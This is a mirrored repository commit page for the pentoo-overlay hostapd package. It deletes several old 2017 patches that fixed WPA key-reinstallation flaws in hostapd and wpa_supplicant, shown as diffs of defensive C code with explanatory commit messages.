Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2026-04-25 16:20:55 +02:00
Code Issues Projects Releases Wiki Activity

hostapd: pkgcheck fixes

Browse source
This commit is contained in:
Rick Farina (Zero_Chaos) 2024-04-03 18:32:41 -04:00
parent cf637ff141
commit 90bf7fcc2c
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
45 changed files with 7 additions and 41355 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
net-wireless/hostapd/Manifest
View file

@ -1,2 +1 @@
DIST hostapd-2.10.tar.gz 2440435 BLAKE2B dbeeae2f62a8ab52df3e2d05ff0467b643cd68349ef3b28814a11dfb67d4b23d14cf2461a3040694706ec614fcd7c2e0fe58f3597e877cf47296cd75e11c792f SHA512 243baa82d621f859d2507d8d5beb0ebda15a75548a62451dc9bca42717dcc8607adac49b354919a41d8257d16d07ac7268203a79750db0cfb34b51f80ff1ce8f
DIST net-wireless_hostapd_2.7-r2_extras.tar.xz 1820 BLAKE2B 5c4daf0e4fcf5ae0803cdbe2aabcc75e89b1e92048e8a01894d73639a16b049174b37eca6b6206c337a2874a6e6d5588d50fa5b8a4813e7f6c22bf02efca852f SHA512 65bc4634c8314280ceab44d1f5d6d62092f4bca48253f107b076211020f6f6502388490aee907f9910846a25ba2da7e4122bdb1873eb2b12bf94e867e3295f4c

174
net-wireless/hostapd/files/2017-1/rebased-v2.6-0001-hostapd-Avoid-key-reinstallation-in-FT-handshake.patch
View file

@ -1,174 +0,0 @@
From cf4cab804c7afd5c45505528a8d16e46163243a2 Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Fri, 14 Jul 2017 15:15:35 +0200
Subject: [PATCH 1/8] hostapd: Avoid key reinstallation in FT handshake
Do not reinstall TK to the driver during Reassociation Response frame
processing if the first attempt of setting the TK succeeded. This avoids
issues related to clearing the TX/RX PN that could result in reusing
same PN values for transmitted frames (e.g., due to CCM nonce reuse and
also hitting replay protection on the receiver) and accepting replayed
frames on RX side.
This issue was introduced by the commit
0e84c25434e6a1f283c7b4e62e483729085b78d2 ('FT: Fix PTK configuration in
authenticator') which allowed wpa_ft_install_ptk() to be called multiple
times with the same PTK. While the second configuration attempt is
needed with some drivers, it must be done only if the first attempt
failed.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/ap/ieee802_11.c | 16 +++++++++++++---
src/ap/wpa_auth.c | 11 +++++++++++
src/ap/wpa_auth.h | 3 ++-
src/ap/wpa_auth_ft.c | 10 ++++++++++
src/ap/wpa_auth_i.h | 1 +
5 files changed, 37 insertions(+), 4 deletions(-)
diff --git a/src/ap/ieee802_11.c b/src/ap/ieee802_11.c
index 4e04169..333035f 100644
--- a/src/ap/ieee802_11.c
+++ b/src/ap/ieee802_11.c
@@ -1841,6 +1841,7 @@ static int add_associated_sta(struct hostapd_data *hapd,
{
struct ieee80211_ht_capabilities ht_cap;
struct ieee80211_vht_capabilities vht_cap;
+ int set = 1;
/*
* Remove the STA entry to ensure the STA PS state gets cleared and
@@ -1848,9 +1849,18 @@ static int add_associated_sta(struct hostapd_data *hapd,
* FT-over-the-DS, where a station re-associates back to the same AP but
* skips the authentication flow, or if working with a driver that
* does not support full AP client state.
+ *
+ * Skip this if the STA has already completed FT reassociation and the
+ * TK has been configured since the TX/RX PN must not be reset to 0 for
+ * the same key.
*/
- if (!sta->added_unassoc)
+ if (!sta->added_unassoc &&
+ (!(sta->flags & WLAN_STA_AUTHORIZED) ||
+ !wpa_auth_sta_ft_tk_already_set(sta->wpa_sm))) {
hostapd_drv_sta_remove(hapd, sta->addr);
+ wpa_auth_sm_event(sta->wpa_sm, WPA_DRV_STA_REMOVED);
+ set = 0;
+ }
#ifdef CONFIG_IEEE80211N
if (sta->flags & WLAN_STA_HT)
@@ -1873,11 +1883,11 @@ static int add_associated_sta(struct hostapd_data *hapd,
sta->flags & WLAN_STA_VHT ? &vht_cap : NULL,
sta->flags | WLAN_STA_ASSOC, sta->qosinfo,
sta->vht_opmode, sta->p2p_ie ? 1 : 0,
- sta->added_unassoc)) {
+ set)) {
hostapd_logger(hapd, sta->addr,
HOSTAPD_MODULE_IEEE80211, HOSTAPD_LEVEL_NOTICE,
"Could not %s STA to kernel driver",
- sta->added_unassoc ? "set" : "add");
+ set ? "set" : "add");
if (sta->added_unassoc) {
hostapd_drv_sta_remove(hapd, sta->addr);
diff --git a/src/ap/wpa_auth.c b/src/ap/wpa_auth.c
index 3587086..707971d 100644
--- a/src/ap/wpa_auth.c
+++ b/src/ap/wpa_auth.c
@@ -1745,6 +1745,9 @@ int wpa_auth_sm_event(struct wpa_state_machine *sm, enum wpa_event event)
#else /* CONFIG_IEEE80211R */
break;
#endif /* CONFIG_IEEE80211R */
+ case WPA_DRV_STA_REMOVED:
+ sm->tk_already_set = FALSE;
+ return 0;
}
#ifdef CONFIG_IEEE80211R
@@ -3250,6 +3253,14 @@ int wpa_auth_sta_wpa_version(struct wpa_state_machine *sm)
}
+int wpa_auth_sta_ft_tk_already_set(struct wpa_state_machine *sm)
+{
+ if (!sm || !wpa_key_mgmt_ft(sm->wpa_key_mgmt))
+ return 0;
+ return sm->tk_already_set;
+}
+
+
int wpa_auth_sta_clear_pmksa(struct wpa_state_machine *sm,
struct rsn_pmksa_cache_entry *entry)
{
diff --git a/src/ap/wpa_auth.h b/src/ap/wpa_auth.h
index 0de8d97..97461b0 100644
--- a/src/ap/wpa_auth.h
+++ b/src/ap/wpa_auth.h
@@ -267,7 +267,7 @@ void wpa_receive(struct wpa_authenticator *wpa_auth,
u8 *data, size_t data_len);
enum wpa_event {
WPA_AUTH, WPA_ASSOC, WPA_DISASSOC, WPA_DEAUTH, WPA_REAUTH,
- WPA_REAUTH_EAPOL, WPA_ASSOC_FT
+ WPA_REAUTH_EAPOL, WPA_ASSOC_FT, WPA_DRV_STA_REMOVED
};
void wpa_remove_ptk(struct wpa_state_machine *sm);
int wpa_auth_sm_event(struct wpa_state_machine *sm, enum wpa_event event);
@@ -280,6 +280,7 @@ int wpa_auth_pairwise_set(struct wpa_state_machine *sm);
int wpa_auth_get_pairwise(struct wpa_state_machine *sm);
int wpa_auth_sta_key_mgmt(struct wpa_state_machine *sm);
int wpa_auth_sta_wpa_version(struct wpa_state_machine *sm);
+int wpa_auth_sta_ft_tk_already_set(struct wpa_state_machine *sm);
int wpa_auth_sta_clear_pmksa(struct wpa_state_machine *sm,
struct rsn_pmksa_cache_entry *entry);
struct rsn_pmksa_cache_entry *
diff --git a/src/ap/wpa_auth_ft.c b/src/ap/wpa_auth_ft.c
index 42242a5..e63b99a 100644
--- a/src/ap/wpa_auth_ft.c
+++ b/src/ap/wpa_auth_ft.c
@@ -780,6 +780,14 @@ void wpa_ft_install_ptk(struct wpa_state_machine *sm)
return;
}
+ if (sm->tk_already_set) {
+ /* Must avoid TK reconfiguration to prevent clearing of TX/RX
+ * PN in the driver */
+ wpa_printf(MSG_DEBUG,
+ "FT: Do not re-install same PTK to the driver");
+ return;
+ }
+
/* FIX: add STA entry to kernel/driver here? The set_key will fail
* most likely without this.. At the moment, STA entry is added only
* after association has been completed. This function will be called
@@ -792,6 +800,7 @@ void wpa_ft_install_ptk(struct wpa_state_machine *sm)
/* FIX: MLME-SetProtection.Request(TA, Tx_Rx) */
sm->pairwise_set = TRUE;
+ sm->tk_already_set = TRUE;
}
@@ -898,6 +907,7 @@ static int wpa_ft_process_auth_req(struct wpa_state_machine *sm,
sm->pairwise = pairwise;
sm->PTK_valid = TRUE;
+ sm->tk_already_set = FALSE;
wpa_ft_install_ptk(sm);
buflen = 2 + sizeof(struct rsn_mdie) + 2 + sizeof(struct rsn_ftie) +
diff --git a/src/ap/wpa_auth_i.h b/src/ap/wpa_auth_i.h
index 72b7eb3..7fd8f05 100644
--- a/src/ap/wpa_auth_i.h
+++ b/src/ap/wpa_auth_i.h
@@ -65,6 +65,7 @@ struct wpa_state_machine {
struct wpa_ptk PTK;
Boolean PTK_valid;
Boolean pairwise_set;
+ Boolean tk_already_set;
int keycount;
Boolean Pair;
struct wpa_key_replay_counter {
--
2.7.4

250
net-wireless/hostapd/files/2017-1/rebased-v2.6-0002-Prevent-reinstallation-of-an-already-in-use-group-ke.patch
View file

@ -1,250 +0,0 @@
From 927f891007c402fefd1ff384645b3f07597c3ede Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Wed, 12 Jul 2017 16:03:24 +0200
Subject: [PATCH 2/8] Prevent reinstallation of an already in-use group key
Track the current GTK and IGTK that is in use and when receiving a
(possibly retransmitted) Group Message 1 or WNM-Sleep Mode Response, do
not install the given key if it is already in use. This prevents an
attacker from trying to trick the client into resetting or lowering the
sequence counter associated to the group key.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/common/wpa_common.h | 11 +++++
src/rsn_supp/wpa.c | 116 ++++++++++++++++++++++++++++++------------------
src/rsn_supp/wpa_i.h | 4 ++
3 files changed, 87 insertions(+), 44 deletions(-)
diff --git a/src/common/wpa_common.h b/src/common/wpa_common.h
index af1d0f0..d200285 100644
--- a/src/common/wpa_common.h
+++ b/src/common/wpa_common.h
@@ -217,6 +217,17 @@ struct wpa_ptk {
size_t tk_len;
};
+struct wpa_gtk {
+ u8 gtk[WPA_GTK_MAX_LEN];
+ size_t gtk_len;
+};
+
+#ifdef CONFIG_IEEE80211W
+struct wpa_igtk {
+ u8 igtk[WPA_IGTK_MAX_LEN];
+ size_t igtk_len;
+};
+#endif /* CONFIG_IEEE80211W */
/* WPA IE version 1
* 00-50-f2:1 (OUI:OUI type)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 3c47879..95bd7be 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -714,6 +714,15 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
const u8 *_gtk = gd->gtk;
u8 gtk_buf[32];
+ /* Detect possible key reinstallation */
+ if (sm->gtk.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) {
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: Not reinstalling already in-use GTK to the driver (keyidx=%d tx=%d len=%d)",
+ gd->keyidx, gd->tx, gd->gtk_len);
+ return 0;
+ }
+
wpa_hexdump_key(MSG_DEBUG, "WPA: Group Key", gd->gtk, gd->gtk_len);
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Installing GTK to the driver (keyidx=%d tx=%d len=%d)",
@@ -748,6 +757,9 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
}
os_memset(gtk_buf, 0, sizeof(gtk_buf));
+ sm->gtk.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+
return 0;
}
@@ -854,6 +866,48 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
}
+#ifdef CONFIG_IEEE80211W
+static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
+ const struct wpa_igtk_kde *igtk)
+{
+ size_t len = wpa_cipher_key_len(sm->mgmt_group_cipher);
+ u16 keyidx = WPA_GET_LE16(igtk->keyid);
+
+ /* Detect possible key reinstallation */
+ if (sm->igtk.igtk_len == len &&
+ os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) {
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: Not reinstalling already in-use IGTK to the driver (keyidx=%d)",
+ keyidx);
+ return 0;
+ }
+
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: IGTK keyid %d pn %02x%02x%02x%02x%02x%02x",
+ keyidx, MAC2STR(igtk->pn));
+ wpa_hexdump_key(MSG_DEBUG, "WPA: IGTK", igtk->igtk, len);
+ if (keyidx > 4095) {
+ wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
+ "WPA: Invalid IGTK KeyID %d", keyidx);
+ return -1;
+ }
+ if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
+ broadcast_ether_addr,
+ keyidx, 0, igtk->pn, sizeof(igtk->pn),
+ igtk->igtk, len) < 0) {
+ wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
+ "WPA: Failed to configure IGTK to the driver");
+ return -1;
+ }
+
+ sm->igtk.igtk_len = len;
+ os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+
+ return 0;
+}
+#endif /* CONFIG_IEEE80211W */
+
+
static int ieee80211w_set_keys(struct wpa_sm *sm,
struct wpa_eapol_ie_parse *ie)
{
@@ -864,30 +918,14 @@ static int ieee80211w_set_keys(struct wpa_sm *sm,
if (ie->igtk) {
size_t len;
const struct wpa_igtk_kde *igtk;
- u16 keyidx;
+
len = wpa_cipher_key_len(sm->mgmt_group_cipher);
if (ie->igtk_len != WPA_IGTK_KDE_PREFIX_LEN + len)
return -1;
+
igtk = (const struct wpa_igtk_kde *) ie->igtk;
- keyidx = WPA_GET_LE16(igtk->keyid);
- wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG, "WPA: IGTK keyid %d "
- "pn %02x%02x%02x%02x%02x%02x",
- keyidx, MAC2STR(igtk->pn));
- wpa_hexdump_key(MSG_DEBUG, "WPA: IGTK",
- igtk->igtk, len);
- if (keyidx > 4095) {
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
- "WPA: Invalid IGTK KeyID %d", keyidx);
- return -1;
- }
- if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
- broadcast_ether_addr,
- keyidx, 0, igtk->pn, sizeof(igtk->pn),
- igtk->igtk, len) < 0) {
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
- "WPA: Failed to configure IGTK to the driver");
+ if (wpa_supplicant_install_igtk(sm, igtk) < 0)
return -1;
- }
}
return 0;
@@ -2307,7 +2345,7 @@ void wpa_sm_deinit(struct wpa_sm *sm)
*/
void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
{
- int clear_ptk = 1;
+ int clear_keys = 1;
if (sm == NULL)
return;
@@ -2333,11 +2371,11 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
/* Prepare for the next transition */
wpa_ft_prepare_auth_request(sm, NULL);
- clear_ptk = 0;
+ clear_keys = 0;
}
#endif /* CONFIG_IEEE80211R */
- if (clear_ptk) {
+ if (clear_keys) {
/*
* IEEE 802.11, 8.4.10: Delete PTK SA on (re)association if
* this is not part of a Fast BSS Transition.
@@ -2347,6 +2385,10 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
sm->tptk_set = 0;
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
+ os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+#ifdef CONFIG_IEEE80211W
+ os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+#endif /* CONFIG_IEEE80211W */
}
#ifdef CONFIG_TDLS
@@ -2877,6 +2919,10 @@ void wpa_sm_drop_sa(struct wpa_sm *sm)
os_memset(sm->pmk, 0, sizeof(sm->pmk));
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
+ os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+#ifdef CONFIG_IEEE80211W
+ os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+#endif /* CONFIG_IEEE80211W */
#ifdef CONFIG_IEEE80211R
os_memset(sm->xxkey, 0, sizeof(sm->xxkey));
os_memset(sm->pmk_r0, 0, sizeof(sm->pmk_r0));
@@ -2949,29 +2995,11 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
os_memset(&gd, 0, sizeof(gd));
#ifdef CONFIG_IEEE80211W
} else if (subelem_id == WNM_SLEEP_SUBELEM_IGTK) {
- struct wpa_igtk_kde igd;
- u16 keyidx;
-
- os_memset(&igd, 0, sizeof(igd));
- keylen = wpa_cipher_key_len(sm->mgmt_group_cipher);
- os_memcpy(igd.keyid, buf + 2, 2);
- os_memcpy(igd.pn, buf + 4, 6);
-
- keyidx = WPA_GET_LE16(igd.keyid);
- os_memcpy(igd.igtk, buf + 10, keylen);
-
- wpa_hexdump_key(MSG_DEBUG, "Install IGTK (WNM SLEEP)",
- igd.igtk, keylen);
- if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
- broadcast_ether_addr,
- keyidx, 0, igd.pn, sizeof(igd.pn),
- igd.igtk, keylen) < 0) {
- wpa_printf(MSG_DEBUG, "Failed to install the IGTK in "
- "WNM mode");
- os_memset(&igd, 0, sizeof(igd));
+ const struct wpa_igtk_kde *igtk;
+
+ igtk = (const struct wpa_igtk_kde *) (buf + 2);
+ if (wpa_supplicant_install_igtk(sm, igtk) < 0)
return -1;
- }
- os_memset(&igd, 0, sizeof(igd));
#endif /* CONFIG_IEEE80211W */
} else {
wpa_printf(MSG_DEBUG, "Unknown element id");
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index f653ba6..afc9e37 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -31,6 +31,10 @@ struct wpa_sm {
u8 rx_replay_counter[WPA_REPLAY_COUNTER_LEN];
int rx_replay_counter_set;
u8 request_counter[WPA_REPLAY_COUNTER_LEN];
+ struct wpa_gtk gtk;
+#ifdef CONFIG_IEEE80211W
+ struct wpa_igtk igtk;
+#endif /* CONFIG_IEEE80211W */
struct eapol_sm *eapol; /* EAPOL state machine from upper level code */
--
2.7.4

184
net-wireless/hostapd/files/2017-1/rebased-v2.6-0003-Extend-protection-of-GTK-IGTK-reinstallation-of-WNM-.patch
View file

@ -1,184 +0,0 @@
From 8280294e74846ea342389a0cd17215050fa5afe8 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 1 Oct 2017 12:12:24 +0300
Subject: [PATCH 3/8] Extend protection of GTK/IGTK reinstallation of WNM-Sleep
Mode cases
This extends the protection to track last configured GTK/IGTK value
separately from EAPOL-Key frames and WNM-Sleep Mode frames to cover a
corner case where these two different mechanisms may get used when the
GTK/IGTK has changed and tracking a single value is not sufficient to
detect a possible key reconfiguration.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/wpa.c | 53 +++++++++++++++++++++++++++++++++++++---------------
src/rsn_supp/wpa_i.h | 2 ++
2 files changed, 40 insertions(+), 15 deletions(-)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 95bd7be..7a2c68d 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -709,14 +709,17 @@ struct wpa_gtk_data {
static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
const struct wpa_gtk_data *gd,
- const u8 *key_rsc)
+ const u8 *key_rsc, int wnm_sleep)
{
const u8 *_gtk = gd->gtk;
u8 gtk_buf[32];
/* Detect possible key reinstallation */
- if (sm->gtk.gtk_len == (size_t) gd->gtk_len &&
- os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) {
+ if ((sm->gtk.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) ||
+ (sm->gtk_wnm_sleep.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk_wnm_sleep.gtk, gd->gtk,
+ sm->gtk_wnm_sleep.gtk_len) == 0)) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Not reinstalling already in-use GTK to the driver (keyidx=%d tx=%d len=%d)",
gd->keyidx, gd->tx, gd->gtk_len);
@@ -757,8 +760,14 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
}
os_memset(gtk_buf, 0, sizeof(gtk_buf));
- sm->gtk.gtk_len = gd->gtk_len;
- os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+ if (wnm_sleep) {
+ sm->gtk_wnm_sleep.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk_wnm_sleep.gtk, gd->gtk,
+ sm->gtk_wnm_sleep.gtk_len);
+ } else {
+ sm->gtk.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+ }
return 0;
}
@@ -852,7 +861,7 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
(wpa_supplicant_check_group_cipher(sm, sm->group_cipher,
gtk_len, gtk_len,
&gd.key_rsc_len, &gd.alg) ||
- wpa_supplicant_install_gtk(sm, &gd, key_rsc))) {
+ wpa_supplicant_install_gtk(sm, &gd, key_rsc, 0))) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"RSN: Failed to install GTK");
os_memset(&gd, 0, sizeof(gd));
@@ -868,14 +877,18 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
#ifdef CONFIG_IEEE80211W
static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
- const struct wpa_igtk_kde *igtk)
+ const struct wpa_igtk_kde *igtk,
+ int wnm_sleep)
{
size_t len = wpa_cipher_key_len(sm->mgmt_group_cipher);
u16 keyidx = WPA_GET_LE16(igtk->keyid);
/* Detect possible key reinstallation */
- if (sm->igtk.igtk_len == len &&
- os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) {
+ if ((sm->igtk.igtk_len == len &&
+ os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) ||
+ (sm->igtk_wnm_sleep.igtk_len == len &&
+ os_memcmp(sm->igtk_wnm_sleep.igtk, igtk->igtk,
+ sm->igtk_wnm_sleep.igtk_len) == 0)) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Not reinstalling already in-use IGTK to the driver (keyidx=%d)",
keyidx);
@@ -900,8 +913,14 @@ static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
return -1;
}
- sm->igtk.igtk_len = len;
- os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+ if (wnm_sleep) {
+ sm->igtk_wnm_sleep.igtk_len = len;
+ os_memcpy(sm->igtk_wnm_sleep.igtk, igtk->igtk,
+ sm->igtk_wnm_sleep.igtk_len);
+ } else {
+ sm->igtk.igtk_len = len;
+ os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+ }
return 0;
}
@@ -924,7 +943,7 @@ static int ieee80211w_set_keys(struct wpa_sm *sm,
return -1;
igtk = (const struct wpa_igtk_kde *) ie->igtk;
- if (wpa_supplicant_install_igtk(sm, igtk) < 0)
+ if (wpa_supplicant_install_igtk(sm, igtk, 0) < 0)
return -1;
}
@@ -1574,7 +1593,7 @@ static void wpa_supplicant_process_1_of_2(struct wpa_sm *sm,
if (wpa_supplicant_rsc_relaxation(sm, key->key_rsc))
key_rsc = null_rsc;
- if (wpa_supplicant_install_gtk(sm, &gd, key_rsc) ||
+ if (wpa_supplicant_install_gtk(sm, &gd, key_rsc, 0) ||
wpa_supplicant_send_2_of_2(sm, key, ver, key_info) < 0)
goto failed;
os_memset(&gd, 0, sizeof(gd));
@@ -2386,8 +2405,10 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
sm->tptk_set = 0;
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+ os_memset(&sm->gtk_wnm_sleep, 0, sizeof(sm->gtk_wnm_sleep));
#ifdef CONFIG_IEEE80211W
os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+ os_memset(&sm->igtk_wnm_sleep, 0, sizeof(sm->igtk_wnm_sleep));
#endif /* CONFIG_IEEE80211W */
}
@@ -2920,8 +2941,10 @@ void wpa_sm_drop_sa(struct wpa_sm *sm)
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+ os_memset(&sm->gtk_wnm_sleep, 0, sizeof(sm->gtk_wnm_sleep));
#ifdef CONFIG_IEEE80211W
os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+ os_memset(&sm->igtk_wnm_sleep, 0, sizeof(sm->igtk_wnm_sleep));
#endif /* CONFIG_IEEE80211W */
#ifdef CONFIG_IEEE80211R
os_memset(sm->xxkey, 0, sizeof(sm->xxkey));
@@ -2986,7 +3009,7 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
wpa_hexdump_key(MSG_DEBUG, "Install GTK (WNM SLEEP)",
gd.gtk, gd.gtk_len);
- if (wpa_supplicant_install_gtk(sm, &gd, key_rsc)) {
+ if (wpa_supplicant_install_gtk(sm, &gd, key_rsc, 1)) {
os_memset(&gd, 0, sizeof(gd));
wpa_printf(MSG_DEBUG, "Failed to install the GTK in "
"WNM mode");
@@ -2998,7 +3021,7 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
const struct wpa_igtk_kde *igtk;
igtk = (const struct wpa_igtk_kde *) (buf + 2);
- if (wpa_supplicant_install_igtk(sm, igtk) < 0)
+ if (wpa_supplicant_install_igtk(sm, igtk, 1) < 0)
return -1;
#endif /* CONFIG_IEEE80211W */
} else {
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index afc9e37..9a54631 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -32,8 +32,10 @@ struct wpa_sm {
int rx_replay_counter_set;
u8 request_counter[WPA_REPLAY_COUNTER_LEN];
struct wpa_gtk gtk;
+ struct wpa_gtk gtk_wnm_sleep;
#ifdef CONFIG_IEEE80211W
struct wpa_igtk igtk;
+ struct wpa_igtk igtk_wnm_sleep;
#endif /* CONFIG_IEEE80211W */
struct eapol_sm *eapol; /* EAPOL state machine from upper level code */
--
2.7.4

79
net-wireless/hostapd/files/2017-1/rebased-v2.6-0004-Prevent-installation-of-an-all-zero-TK.patch
View file

@ -1,79 +0,0 @@
From 8f82bc94e8697a9d47fa8774dfdaaede1084912c Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Fri, 29 Sep 2017 04:22:51 +0200
Subject: [PATCH 4/8] Prevent installation of an all-zero TK
Properly track whether a PTK has already been installed to the driver
and the TK part cleared from memory. This prevents an attacker from
trying to trick the client into installing an all-zero TK.
This fixes the earlier fix in commit
ad00d64e7d8827b3cebd665a0ceb08adabf15e1e ('Fix TK configuration to the
driver in EAPOL-Key 3/4 retry case') which did not take into account
possibility of an extra message 1/4 showing up between retries of
message 3/4.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/common/wpa_common.h | 1 +
src/rsn_supp/wpa.c | 5 ++---
src/rsn_supp/wpa_i.h | 1 -
3 files changed, 3 insertions(+), 4 deletions(-)
diff --git a/src/common/wpa_common.h b/src/common/wpa_common.h
index d200285..1021ccb 100644
--- a/src/common/wpa_common.h
+++ b/src/common/wpa_common.h
@@ -215,6 +215,7 @@ struct wpa_ptk {
size_t kck_len;
size_t kek_len;
size_t tk_len;
+ int installed; /* 1 if key has already been installed to driver */
};
struct wpa_gtk {
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 7a2c68d..0550a41 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -510,7 +510,6 @@ static void wpa_supplicant_process_1_of_4(struct wpa_sm *sm,
os_memset(buf, 0, sizeof(buf));
}
sm->tptk_set = 1;
- sm->tk_to_set = 1;
kde = sm->assoc_wpa_ie;
kde_len = sm->assoc_wpa_ie_len;
@@ -615,7 +614,7 @@ static int wpa_supplicant_install_ptk(struct wpa_sm *sm,
enum wpa_alg alg;
const u8 *key_rsc;
- if (!sm->tk_to_set) {
+ if (sm->ptk.installed) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Do not re-install same PTK to the driver");
return 0;
@@ -659,7 +658,7 @@ static int wpa_supplicant_install_ptk(struct wpa_sm *sm,
/* TK is not needed anymore in supplicant */
os_memset(sm->ptk.tk, 0, WPA_TK_MAX_LEN);
- sm->tk_to_set = 0;
+ sm->ptk.installed = 1;
if (sm->wpa_ptk_rekey) {
eloop_cancel_timeout(wpa_sm_rekey_ptk, sm, NULL);
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index 9a54631..41f371f 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -24,7 +24,6 @@ struct wpa_sm {
struct wpa_ptk ptk, tptk;
int ptk_set, tptk_set;
unsigned int msg_3_of_4_ok:1;
- unsigned int tk_to_set:1;
u8 snonce[WPA_NONCE_LEN];
u8 anonce[WPA_NONCE_LEN]; /* ANonce from the last 1/4 msg */
int renew_snonce;
--
2.7.4

64
net-wireless/hostapd/files/2017-1/rebased-v2.6-0005-Fix-PTK-rekeying-to-generate-a-new-ANonce.patch
View file

@ -1,64 +0,0 @@
From 12fac09b437a1dc8a0f253e265934a8aaf4d2f8b Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
